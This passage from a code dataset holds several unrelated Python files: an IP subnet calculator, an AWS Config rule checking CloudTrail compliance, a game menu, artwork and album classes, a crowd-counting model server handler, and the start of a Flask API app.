str( (0x0000ff00 & mask) >> 8) + '.' 
+\r\n str( (0x000000ff & mask)))\r\n\t\t\r\ndef adres_sieci(adres,cidr):\r\n\tmaska = cidr_mask(cidr)\r\n\tadres = change_to_int(adres)\r\n\tmaska = change_to_int(maska)\r\n\tx = [adres[0]&maska[0], adres[1]&maska[1], adres[2]&maska[2], adres[3]&maska[3]]\r\n\treturn (\"{}.{}.{}.{}/{}\".format(x[0],x[1],x[2],x[3],cidr))\r\n\t\r\ndef klasa_sieci(adres):\r\n\ta = adres.split(\".\")\r\n\ta = int(a[0])\r\n\t\r\n\tif(a >= 1 and a <= 127):\r\n\t\treturn \"A\"\r\n\telif (a >=128 and a<=191):\r\n\t\treturn \"B\"\r\n\telif (a >=192 and a<=223):\r\n\t\treturn \"C\"\r\n\telif (a >=224 and a<=239):\r\n\t\treturn \"D\"\r\n\telse:\r\n\t\treturn \"E\"\r\n\t\r\ndef binary_address(adres):\r\n\tadres = change_to_int(adres)\r\n\treturn (\"{}.{}.{}.{}\".format(bin(adres[0])[2:].zfill(8),bin(adres[1])[2:].zfill(8),bin(adres[2])[2:].zfill(8),bin(adres[3])[2:].zfill(8)))\r\n\r\ndef broadcast_address(adres, maska):\r\n\t\r\n\tadres = change_to_int(adres)\r\n\tmaska = change_to_int(maska)\r\n\tbroadcast = [int(bin(a | ~b), 2) & 0xff for a, b in zip(adres, maska)]\r\n\treturn (\"{}.{}.{}.{}\".format(broadcast[0],broadcast[1],broadcast[2],broadcast[3]))\r\n\t\r\ndef host_min(adres): \t#adres sieci\r\n\t\r\n\thost_min, maska = adres.split(\"/\")\r\n\thost_min = host_min.split(\".\")\r\n\thost_min[3] = str(int(host_min[3])+1)\r\n\t\r\n\treturn (\"{}.{}.{}.{}\".format(host_min[0],host_min[1],host_min[2],host_min[3]))\r\n\r\ndef host_max(adres):\t#adres broadcast\r\n\thost_min = adres.split(\".\")\r\n\thost_min[3] = str(int(host_min[3])-1)\r\n\treturn (\"{}.{}.{}.{}\".format(host_min[0],host_min[1],host_min[2],host_min[3]))\r\n\t\r\ndef host_length(maska):\r\n\tliczba = pow(2, 32-int(maska)) -2\r\n\tif(liczba < 0):\r\n\t\tliczba = 0\r\n\treturn liczba\r\n\t\r\nwarunek = True\r\nif (len(sys.argv) > 1):\r\n\tcalosc = sys.argv[1]\r\n\tif (format_validator(calosc)):\r\n\t\tadres, maska = calosc.split(\"/\")\t\t\t\r\n\t\tif not (address_validator(adres, maska)):\r\n\t\t\twarunek = False\r\n\telse:\r\n\t\twarunek = False\r\nelse:\r\n\tadres = socket.gethostbyname(socket.gethostname())\r\n\tadres = ipaddress.ip_network(adres)\r\n\tadres,maska = str(adres).split(\"/\")\r\n\r\nif(warunek):\r\n\r\n\tmaska_dziesietnie = cidr_mask(maska)\r\n\tadres_sieci = adres_sieci(adres,maska)\r\n\tklasa_sieci = klasa_sieci(adres)\r\n\tmaska_binarnie = binary_address(maska_dziesietnie)\r\n\tbroadcast_address = broadcast_address(adres,maska_dziesietnie)\r\n\tbroadcast_address_binarnie = binary_address(broadcast_address)\r\n\thost_min = host_min(adres_sieci)\r\n\thost_min_binarnie = binary_address(host_min)\r\n\thost_max = host_max(broadcast_address)\r\n\thost_max_binarnie = binary_address(host_max)\r\n\thost_length = host_length(maska)\r\n\thost_length_binarnie = bin(int(host_length))[2:].zfill(8)\r\n\tif(int(maska) > 30):\r\n\t\thost_min = \"brak\"\r\n\t\thost_min_binarnie =\"brak\"\r\n\t\thost_max = \"brak\"\r\n\t\thost_max_binarnie = \"brak\"\r\n\t\thost_length = \"punkt-punkt\"\r\n\t\thost_length_binarnie = \"punkt-punkt\"\r\n\tif(int(maska) == 32):\r\n\t\tadres_sieci = \"brak\"\r\n\t\tklasa_sieci = \"brak\"\r\n\t\tbroadcast_address = \"brak\"\r\n\t\tbroadcast_address_binarnie = \"brak\"\r\n\t\thost_length = \"to jest pojedynczy host, nie siec\"\r\n\t\thost_length_binarnie = \"to jest pojedyczny host, nie siec\"\r\n\tprint(\"Adres sieci: {0} \".format(adres_sieci))\r\n\tprint(\"Klasa sieci: {0} \".format(klasa_sieci))\r\n\tprint(\"Maska binarnie: {0} \".format(maska_binarnie))\r\n\tprint(\"Maska dziesietnie: {0} 
\".format(maska_dziesietnie))\r\n\tprint(\"Broadcast binarnie: {0} \".format(broadcast_address_binarnie))\r\n\tprint(\"Broadcast dziesietnie: {0} \".format(broadcast_address))\r\n\tprint(\"Host min binarnie: {0} \".format(host_min_binarnie))\r\n\tprint(\"Host min dziesietnie: {0} \".format(host_min))\r\n\tprint(\"Host max binarnie: {0} \".format(host_max_binarnie))\r\n\tprint(\"Host max dziesietnie: {0} \".format(host_max))\r\n\tprint(\"Ilosc hostow binarnie: {0} \".format(host_length_binarnie))\r\n\tprint(\"Ilosc hostow dziesietnie: {0} \".format(host_length))\r\n\tdata = {}\r\n\tdata['adres'] = []\r\n\tdata['adres'].append({\r\n\t\t'adres sieci' : adres_sieci,\r\n\t\t'klasa sieci' : klasa_sieci,\r\n\t\t'maska sieci binarnie' : maska_binarnie,\r\n\t\t'maska sieci dziesietnie' : maska_dziesietnie,\r\n\t\t'adres broadcast binarnie' : broadcast_address_binarnie,\r\n\t\t'adres broadcast dziesietnie' : broadcast_address,\r\n\t\t'min adres hosta binarnie' : host_min_binarnie,\r\n\t\t'min adres hosta dziesietnie' : host_min,\r\n\t\t'max adres hosta binarnie' : host_max_binarnie,\r\n\t\t'max adres hosta dziesietnie' : host_max,\r\n\t\t'ilosc hostow binarnie' : host_length_binarnie,\r\n\t\t'ilosc hostow dziesietnie' : host_length\r\n\t})\r\n\twith open('data.json', 'w') as outfile:\r\n\t\r\n\t\tjson.dump(data, outfile)\r\nelse:\r\n\tprint(\"Wprowadzono niepoprawny adres\")\r\n","sub_path":"SimpleIPCalculator/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":5430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"611034338","text":"#\n# Copyright 2017-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# or in the \"license\" file accompanying this file. This file is distributed \n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either \n# express or implied. See the License for the specific language governing \n# permissions and limitations under the License.\n#\n\n#\n# Detective Controls\n# cloudtrail_centralized_encrypted_lfi\n#\n\nimport json\nimport boto3\nimport sys\nimport time\nimport re\nfrom datetime import datetime\n\n#############################################\n# Parameters to modify for your environment #\n#############################################\n\n## Specify the bucket name where at least 1 AWS CloudTrail should be centralized, ideally in a centralized Logging AWS Account. 
\nAWS_CLOUDTRAIL_NAME = 'Security_Trail_DO-NOT-MODIFY'\nAWS_CLOUDTRAIL_S3_BUCKET_NAME = ''\nAWS_CLOUDTRAIL_KMS_KEY_ARN = ''\n\n########\n# Code #\n########\n\ndef cloudtrail_centralized_encrypted_lfi(event):\n    # This rule verifies that a defined CloudTrail Trail sends all logs to a centralized S3 bucket.\n    #\n    # Scope\n    # This rule covers one particular trail and is triggered periodically.\n    #\n    # Prerequisites \n    # Configure the following in the code of this lambda function\n    # 1) AWS_CLOUDTRAIL_NAME [Name of the Trail to look for]\n    # 2) AWS_CLOUDTRAIL_S3_BUCKET_NAME [Name of the S3 bucket, ideally in the centralized Security Logging Account]\n    # 3) AWS_CLOUDTRAIL_KMS_KEY_ARN [KMS CMK ARN used to encrypt CloudTrail, ideally in the centralized Security Logging Account]\n    #\n    # Use cases\n    # The following logic is applied: \n    # No Trail is configured -> NOT COMPLIANT\n    # No Trail named AWS_CLOUDTRAIL_NAME value is configured -> NOT COMPLIANT\n    # The Trail named AWS_CLOUDTRAIL_NAME value is inactive -> NOT COMPLIANT\n    # The Trail named AWS_CLOUDTRAIL_NAME value does not include global resources -> NOT COMPLIANT\n    # The Trail named AWS_CLOUDTRAIL_NAME value is not multi-region -> NOT COMPLIANT\n    # The Trail named AWS_CLOUDTRAIL_NAME value has no Log File Integrity -> NOT COMPLIANT\n    # The Trail named AWS_CLOUDTRAIL_NAME value is not logging all Management Events -> NOT COMPLIANT\n    # The Trail named AWS_CLOUDTRAIL_NAME value is not logging all S3 Data Events -> NOT COMPLIANT\n    # AWS_CLOUDTRAIL_S3_BUCKET_NAME is not defined -> NOT COMPLIANT\n    # The Trail named AWS_CLOUDTRAIL_NAME value is not logging in AWS_CLOUDTRAIL_S3_BUCKET_NAME -> NOT COMPLIANT\n    # AWS_CLOUDTRAIL_KMS_KEY_ARN is not defined -> NOT COMPLIANT\n    # The Trail named AWS_CLOUDTRAIL_NAME value is not encrypted -> NOT COMPLIANT\n    # The Trail named AWS_CLOUDTRAIL_NAME value is not encrypted using AWS_CLOUDTRAIL_KMS_KEY_ARN -> NOT COMPLIANT\n    # The Trail named AWS_CLOUDTRAIL_NAME value is active, global, multi-region, has log file integrity, logs in AWS_CLOUDTRAIL_S3_BUCKET_NAME and is encrypted with AWS_CLOUDTRAIL_KMS_KEY_ARN -> COMPLIANT\n\n    cloudtrail_client = STS_SESSION.client(\"cloudtrail\") \n    \n    eval = {}\n    eval[\"Configuration\"] = cloudtrail_client.describe_trails()['trailList']\n    print(eval)\n\n    if len(eval['Configuration']) == 0:\n        response= {\n        \"ComplianceType\": \"NON_COMPLIANT\",\n        \"Annotation\": \"No Trail is configured.\"\n        }\n    else:\n        trail_found = False\n\n        for trail in eval['Configuration']:\n            if trail[\"Name\"] == AWS_CLOUDTRAIL_NAME:\n                trail_found = True\n        if trail_found == False:\n            response= {\n            \"ComplianceType\": \"NON_COMPLIANT\",\n            \"Annotation\": \"No Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is configured.\"\n            }\n        else:\n            correct_trail_status = cloudtrail_client.get_trail_status(Name=AWS_CLOUDTRAIL_NAME)\n            correct_trail = cloudtrail_client.describe_trails(trailNameList=[AWS_CLOUDTRAIL_NAME])['trailList'][0]\n            correct_trail_selector = cloudtrail_client.get_event_selectors(TrailName=AWS_CLOUDTRAIL_NAME)['EventSelectors'][0]\n            print(correct_trail_selector)\n            \n            if correct_trail_status['IsLogging'] != True:\n                response= {\n                \"ComplianceType\": \"NON_COMPLIANT\",\n                \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is not enabled.\"\n                }\n            # elif (not a bare if) so a disabled trail cannot be overwritten as COMPLIANT by the chain's final else\n            elif 'LatestDeliveryError' in correct_trail_status:\n                response= {\n                \"ComplianceType\": \"NON_COMPLIANT\",\n                \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" did not deliver the logs as expected. The current error is \" + correct_trail_status['LatestDeliveryError'] + \". 
Contact the Security team.\"\n }\n elif correct_trail['IncludeGlobalServiceEvents'] != True:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is not logging global resources.\"\n }\n elif correct_trail['IsMultiRegionTrail'] != True:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is not logging in all regions.\"\n }\n elif correct_trail['LogFileValidationEnabled'] != True:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" has not log file integrity enabled.\"\n }\n elif correct_trail_selector['ReadWriteType'] != 'All' or correct_trail_selector['IncludeManagementEvents'] != True:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" does not log ALL Management events.\"\n }\n elif len(correct_trail_selector['DataResources'])==0 or str(correct_trail_selector['DataResources'][0]) != \"{'Type': 'AWS::S3::Object', 'Values': ['arn:aws:s3']}\":\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" does not log ALL S3 Data Events.\"\n }\n elif AWS_CLOUDTRAIL_S3_BUCKET_NAME == \"\":\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The parameter \\\"AWS_CLOUDTRAIL_S3_BUCKET_NAME\\\" is not defined in the lambda code. Contact the Security team.\"\n } \n elif correct_trail['S3BucketName'] != AWS_CLOUDTRAIL_S3_BUCKET_NAME:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is not logging in the S3 bucket named \" + AWS_CLOUDTRAIL_S3_BUCKET_NAME + \".\"\n }\n elif AWS_CLOUDTRAIL_KMS_KEY_ARN == \"\":\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The parameter \\\"AWS_CLOUDTRAIL_KMS_KEY_ARN\\\" is not defined in the lambda code. 
Contact the Security team.\"\n }\n elif 'KmsKeyId' not in correct_trail:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is not encrypted.\"\n } \n elif correct_trail['KmsKeyId'] != AWS_CLOUDTRAIL_KMS_KEY_ARN:\n response= {\n \"ComplianceType\": \"NON_COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is not encrypted using \" + AWS_CLOUDTRAIL_KMS_KEY_ARN + \".\"\n }\n else:\n response = {\n \"ComplianceType\": \"COMPLIANT\",\n \"Annotation\": \"The Trail named \"+ AWS_CLOUDTRAIL_NAME +\" is active and well defined to send logs to \"+AWS_CLOUDTRAIL_S3_BUCKET_NAME+\" and proper encryption.\"\n }\n \n eval[\"ComplianceResourceType\"]=\"AWS::CloudTrail::Trail\"\n eval[\"ComplianceResourceId\"]=AWS_CLOUDTRAIL_NAME\n eval[\"ComplianceType\"]=response[\"ComplianceType\"]\n eval[\"Annotation\"]=response[\"Annotation\"]\n eval[\"OrderingTimestamp\"]=json.loads(event[\"invokingEvent\"])['notificationCreationTime']\n put_eval(eval, result_token) \n\ndef build_evaluation(event, complianceType, annotation, region, eval_resource_type = \"AWS::::Account\"):\n return {\n \"ComplianceResourceType\": eval_resource_type,\n \"ComplianceResourceId\": region['RegionName'] + \" \" + event['accountId'],\n \"ComplianceType\": complianceType,\n \"Annotation\": annotation,\n \"OrderingTimestamp\": str(json.loads(event[\"invokingEvent\"])['notificationCreationTime'])\n }\n\ndef get_sts_session(event, region_name=False):\n sts = boto3.client(\"sts\")\n RoleArn = event[\"executionRoleArn\"]\n if not region_name:\n region_name = event['configRuleArn'].split(\":\")[3]\n response = sts.assume_role(\n RoleArn=RoleArn,\n RoleSessionName='ComplianceAudit',\n DurationSeconds=900)\n sts_session = boto3.Session(\n aws_access_key_id=response['Credentials']['AccessKeyId'],\n aws_secret_access_key=response['Credentials']['SecretAccessKey'],\n aws_session_token=response['Credentials']['SessionToken'],\n region_name=region_name,\n botocore_session=None,\n profile_name=None)\n return(sts_session)\n\ndef put_eval(eval, token):\n config = STS_SESSION.client(\"config\")\n config.put_evaluations(\n Evaluations=[\n {\n \"ComplianceResourceType\": eval[\"ComplianceResourceType\"],\n \"ComplianceResourceId\": eval[\"ComplianceResourceId\"],\n \"ComplianceType\": eval[\"ComplianceType\"],\n \"Annotation\": eval[\"Annotation\"],\n \"OrderingTimestamp\": eval[\"OrderingTimestamp\"]\n },\n ],\n ResultToken=token\n )\n \n# This is the handler that is invoked by Lambda\ndef lambda_handler(event, context):\n global STS_SESSION\n STS_SESSION = ''\n \n global result_token\n if \"resultToken\" in event:\n result_token = event[\"resultToken\"]\n else:\n result_token = \"No token found.\"\n\n STS_SESSION = get_sts_session(event)\n \n cloudtrail_centralized_encrypted_lfi(event)","sub_path":"compliance-account-rulesets-setup/rule-code/CLOUDTRAIL_CENTRALIZED_ENCRYPTED_LFI.py","file_name":"CLOUDTRAIL_CENTRALIZED_ENCRYPTED_LFI.py","file_ext":"py","file_size_in_byte":10553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358295588","text":"#!/usr/bin/env python3\nfrom create_room import *\nfrom list_rooms import *\n\ndef underline(input, char = '-'):\n print(input)\n print(char*len(input))\n print()\n\nmenu_options = {1: 'create new rooms', 2: 'list rooms', 3: 'quit', 4: 'dump rooms to file', 5: 'delete room'}\n\ndef connect():\n client = MongoClient()\n db = client.test\n db.set_profiling_level(2)\n return 
db\n\ndef show_menu():\n underline('Welcome to adventure game')\n for x in menu_options:\n print('Press ', x,' to '+menu_options[x])\n choice = input('What would you like to do?')\n return menu_options[int(choice)]\n\ndef dump_to_file():\n output = open('rooms.txt', mode = 'wt', encoding='utf-8')\n db = connect()\n collection = db.rooms\n rooms = collection.find()\n for room in rooms:\n output.write(str(room['description']))\n output.close()\n\ndef delete_room(index):\n db = connect()\n collection = db.rooms\n collection.delete_one({'index':index})\n\ndef main():\n option = show_menu()\n if option == 'create new rooms':\n create_room()\n list_rooms()\n main()\n if option == 'list rooms':\n list_rooms()\n main()\n if option == 'dump rooms to file':\n dump_to_file()\n if option == 'delete room':\n choice = input('What room?')\n delete_room(choice)\n else:\n exit()\nmain()\n","sub_path":"python/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"634440730","text":"import datetime\n\nclass Artwork:\n def __init__(self, db_dict=None):\n if db_dict is None:\n db_dict = {'title': 'SampleTitle', 'author_name': 'SampleAuthor', 'author_link': 'Empty',\n 'author_logo': 'pics/no-pic.jpg', 'work_id': '00000', 'description': 'No', 'cover': 'no-pic.jpg',\n 'content': []}\n\n self.title = db_dict['title']\n self.author_name = db_dict['author_name']\n self.author_link = db_dict['author_link']\n self.author_logo = db_dict['author_logo']\n self.description = db_dict['description']\n self.id = db_dict['work_id']\n self.add_date = datetime.datetime.utcnow()\n self.content = db_dict['content']\n self.cover_url = db_dict['cover']\n\n\n\n def to_dict(self):\n return {\"title\": self.title, \"author_name\": self.author_name, \"author_link\": self.author_link,\n \"description\": self.description, \"author_logo\": self.author_logo, \"date\": self.add_date,\n \"work_id\": self.id, \"cover\":self.cover_url, \"content\": self.content}\n\n\ndef content_show(f):\n def wrapper(*args, **kwargs):\n result = f(*args, **kwargs)\n if result:\n return [str(item) for item in result]\n else:\n return 'Empty album'\n return wrapper\n\n\nclass Album:\n def __init__(self, data=[]):\n self.last_upload = 'None'\n self.container = []\n if type(data) is str:\n self.title = data\n else:\n self.title = data['name']\n if len(data['pics']) > 0:\n for work in data['pics']:\n self.container.append(Artwork(work))\n self.last_upload = self.container[-1].add_date\n\n\n def __len__(self):\n return len(self.container)\n\n def __getitem__(self, item):\n return self.container[item]\n\n def append(self, art_inst=Artwork):\n self.container.append(art_inst)\n self.last_upload = art_inst.add_date\n\n def remove_artwork(self, id):\n for i in range(len(self.container)):\n if self.container[i].id == id:\n self.container.pop(i)\n if len(self.container) > 0:\n self.last_upload = self.container[-1].add_date\n else:\n self.last_upload = \"None\"\n return 1\n return 0\n\n def pop(self, id_name):\n poped = 0\n for i in range(len(self.container)):\n if self.container[i].id == id_name:\n poped = self.container.pop(i)\n if len(self.container) > 0:\n self.last_upload = self.container[-1].add_date\n else:\n self.last_upload = \"None\"\n return poped\n return poped\n\n def rename(self, new_name):\n self.title = new_name\n\n def check_id(self, work_id):\n checker = False;\n for art in self.container:\n if art.id == work_id:\n checker = True\n 
break\n return checker\n\n\n\n\n @content_show\n def show_album(self):\n return self.container\n\n def to_dict(self):\n return {\"name\": self.title, \"last_updated\": self.last_upload, \"pics\": [item.to_dict() for item in self.container]}\n","sub_path":"arts.py","file_name":"arts.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"296155290","text":"import io\nimport logging\nimport numpy as np\nimport os\nimport zipfile\nimport torch\nfrom PIL import Image\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torchvision import transforms\nimport subprocess\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_pad(inputs,DIV=64):\n h,w = inputs.size()[-2:]\n ph,pw = (DIV-h%DIV),(DIV-w%DIV)\n # print(ph,pw)\n \n tmp_pad = [0,0,0,0]\n if (ph!=DIV): \n tmp_pad[2],tmp_pad[3] = 0,ph\n if (pw!=DIV):\n tmp_pad[0],tmp_pad[1] = 0,pw\n \n # print(tmp_pad)\n inputs = F.pad(inputs,tmp_pad)\n \n return inputs\n\nclass CrowdCounterHandler(object):\n \"\"\"\n MNISTDigitClassifier handler class. This handler takes a greyscale image\n and returns the digit in that image.\n \"\"\"\n\n def __init__(self):\n self.model = None\n self.mapping = None\n self.device = None\n self.batch_size = None\n self.initialized = False\n\n def initialize(self, ctx):\n \"\"\"First try to load torchscript else load eager mode state_dict based model\"\"\"\n\n properties = ctx.system_properties\n self.batch_size = int(properties.get(\"batch_size\"))\n logger.info('Context details: \\n {0}\\n'.format(str(ctx.system_properties)))\n self.device = torch.device(\"cuda:\" + str(properties.get(\"gpu_id\")) if torch.cuda.is_available() else \"cpu\")\n # self.device = torch.device(\"cpu\")\n model_dir = properties.get(\"model_dir\")\n logger.info('Model Dir: '+str(model_dir))\n # modelpath = os.path.join(model_dir,\"Network/crowdmodel_sha\")\n for file in os.listdir(model_dir):\n if zipfile.is_zipfile(file): \n logger.info('UnZipping File: '+str(file))\n with zipfile.ZipFile(file) as item:\n item.extractall() # extract it in the working directory\n \n # To Check if zip extracted correctly\n # cmd = ['ls', model_dir]\n # proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n \n # o, e = proc.communicate()\n \n # logger.info('Output: ' + o.decode('ascii'))\n # logger.info('Error: ' + e.decode('ascii'))\n\n from crowdmodel_sha import CrowdCounter\n \n # Read model serialize/pt file\n model_pt_path = os.path.join(model_dir, \"ssdcnet_sha_best_epoch.pth\")\n # Read model definition file\n model_def_path = os.path.join(model_dir, \"crowdmodel_sha.py\")\n if not os.path.isfile(model_def_path):\n raise RuntimeError(\"Missing the model definition file\")\n\n state_dict = torch.load(model_pt_path, map_location=self.device)\n self.model = CrowdCounter()\n self.model.load_state_dict(state_dict)\n self.model.to(self.device)\n self.model.eval()\n\n logger.info('Model file {0} loaded successfully'.format(model_pt_path))\n self.initialized = True\n\n def preprocess(self, request):\n \"\"\"\n Converts, pads, and normalizes a PIL image for CrowdCounting model,\n returns an Numpy array\n \"\"\"\n logger.info(\"Inside Preprocessing: \")\n image_tensor = None\n # self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n rgb_avg = [0.40954337, 0.36924595, 0.3595245]\n rgb_avg = np.array(rgb_avg).reshape(1,1,3)\n # rgb = mat['rgbMean'].reshape(1, 1, 3)\n \n for idx, data in enumerate(request):\n 
image = data.get(\"data\")\n if image is None:\n image = data.get(\"body\")\n \n # logger.info(\"Data: \"+ str(data))\n logger.info(\"Datatype: \"+ str(type(data)))\n image = Image.open(io.BytesIO(image)).convert('RGB')\n # image = Image.open(data).convert('RGB')\n image = transforms.ToTensor()(image)\n image = image[None,:,:,:]\n logger.info(\"Before padding: \"+ str(image.shape))\n image = get_pad(image,DIV=64)\n logger.info(\"After padding: \"+str(image.shape))\n image = image - torch.Tensor(rgb_avg).view(3,1,1)\n if image.shape is not None:\n if image_tensor is None:\n image_tensor = image\n print(\"inside if\")\n else:\n image_tensor = torch.cat((image_tensor, image), 0)\n print(\"inside else\")\n print(\"final images shape:\"+str(image_tensor.size()))\n return image_tensor.type(torch.float32).to(self.device)\n \n def inference(self, img):\n ''' Predict the count in the image using a SSDC-Net model.\n '''\n #output_counts = []\n features = self.model.forward(img)\n print(\"Feature type:\"+str(type(features)))\n for key, v in features.items():\n if (isinstance(v, list)):\n print(str(key) + \": \" +str(len(v)))\n else:\n print(str(key) + \": \" +str(v.size()))\n # print(\"Features:\"+str(features))\n # print(\"Feature shape:\"+str(features.shape))\n # num_rows, num_cols = features.shape\n \n div_res = self.model.resample(features)\n print(\"Div Res:\")\n for key, v in div_res.items():\n if (isinstance(v, list)):\n print(str(key) + \": \" +str(len(v)))\n else:\n print(str(key) + \": \" +str(v.size()))\n \n merge_res = self.model.parse_merge(div_res)\n print(\"Merge Result:\")\n for key, v in merge_res.items():\n if (isinstance(v, list)):\n print(str(key) + \": \" +str(len(v)))\n else:\n print(str(key) + \": \" +str(v.size()))\n logger.info(\"before outputs: \")\n \n output_counts = []\n for i in range(merge_res['div'+str(self.model.div_times)].size()[0]):\n logger.info(\"iter: \" + str(i))\n # print(type(merge_res['div2']))\n # print(str(merge_res['div2'].size()))\n # print(type(merge_res['div2'][0]))\n # print(str(merge_res['div2'][0].size()))\n outputs = merge_res['div'+str(self.model.div_times)][i].sum()\n outputs = round(outputs.item())\n # print(type(outputs))\n print(str(outputs))\n output_counts.append(outputs)\n logger.info(\"before returning: \")\n return output_counts\n\n # def postprocess(self, inference_output):\n # return inference_output\n\n\n_service = CrowdCounterHandler()\n\n\ndef handle(data, context):\n if not _service.initialized:\n _service.initialize(context)\n\n if data is None:\n return None\n # logger.info(\"Data: \"+ str(data))\n logger.info(\"Datatype: \"+ str(type(data)))\n data = _service.preprocess(data)\n logger.info(\"Done preprocessin...\")\n data = _service.inference(data)\n logger.info(\"done inference... 
\")\n torch.cuda.empty_cache()\n # data = _service.postprocess(data)\n\n return data\n","sub_path":"utils/crdcnt_handler_sha_gpu.py","file_name":"crdcnt_handler_sha_gpu.py","file_ext":"py","file_size_in_byte":7024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"349585871","text":"# -*- coding: utf-8 -*-\n\"\"\"Flask App for MPContribs API\"\"\"\nimport logging\nimport boto3\nimport requests\n\nfrom importlib import import_module\nfrom flask import Flask, current_app, request\nfrom flask_marshmallow import Marshmallow\nfrom flask_mongoengine import MongoEngine\nfrom flask_mongorest import register_class\nfrom flask_log import Logging\nfrom flask_sse import sse\nfrom flask_compress import Compress\nfrom flasgger.base import Swagger\n\nfrom mongoengine import ValidationError\nfrom mongoengine.base.datastructures import BaseDict\nfrom itsdangerous import URLSafeTimedSerializer\nfrom string import punctuation\nfrom boltons.iterutils import remap, default_enter\nfrom notebook.utils import url_path_join\nfrom notebook.gateway.managers import GatewayClient\nfrom requests.exceptions import ConnectionError\n\n\ndelimiter, max_depth = \".\", 4\ninvalidChars = set(punctuation.replace(\"*\", \"\"))\ninvalidChars.add(\" \")\n\nfor mod in [\n \"matplotlib\",\n \"toronado.cssutils\",\n \"selenium.webdriver.remote.remote_connection\",\n \"botocore\",\n \"websockets.protocol\",\n \"asyncio\",\n]:\n log = logging.getLogger(mod)\n log.setLevel(\"INFO\")\n\nlogger = logging.getLogger(\"app\")\nsns_client = boto3.client(\"sns\")\n\n\ndef enter(path, key, value):\n if isinstance(value, BaseDict):\n return dict(), value.items()\n elif isinstance(value, list):\n dot_path = delimiter.join(list(path) + [key])\n raise ValidationError(f\"lists not allowed ({dot_path})!\")\n\n return default_enter(path, key, value)\n\n\ndef valid_key(key):\n for char in key:\n if char in invalidChars:\n raise ValidationError(f\"invalid character {char} in {key}\")\n\n\ndef visit(path, key, value):\n key = key.strip()\n\n if len(path) + 1 > max_depth:\n dot_path = delimiter.join(list(path) + [key])\n raise ValidationError(f\"max nesting ({max_depth}) exceeded for {dot_path}\")\n\n valid_key(key)\n return key, value\n\n\ndef valid_dict(dct):\n remap(dct, visit=visit, enter=enter)\n\n\ndef send_email(to, subject, template):\n sns_client.publish(TopicArn=to, Message=template, Subject=subject)\n\n\ndef get_collections(db):\n \"\"\"get list of collections in DB\"\"\"\n conn = db.app.extensions[\"mongoengine\"][db][\"conn\"]\n dbname = db.app.config.get(\"MPCONTRIBS_DB\")\n return conn[dbname].list_collection_names()\n\n\ndef get_resource_as_string(name, charset=\"utf-8\"):\n \"\"\"http://flask.pocoo.org/snippets/77/\"\"\"\n with current_app.open_resource(name) as f:\n return f.read().decode(charset)\n\n\ndef get_kernels():\n \"\"\"retrieve list of kernels from KernelGateway service\"\"\"\n gw_client = GatewayClient.instance()\n base_endpoint = url_path_join(gw_client.url, gw_client.kernels_endpoint)\n\n try:\n r = requests.get(base_endpoint)\n except ConnectionError:\n print(\"WARNING: Kernel Gateway NOT AVAILABLE\")\n return None\n\n kernels = r.json()\n return {kernel[\"id\"]: None for kernel in kernels}\n\n\ndef get_consumer():\n groups = request.headers.get(\"X-Authenticated-Groups\", \"\").split(\",\")\n groups += request.headers.get(\"X-Consumer-Groups\", \"\").split(\",\")\n return {\n \"username\": request.headers.get(\"X-Consumer-Username\"),\n \"apikey\": 
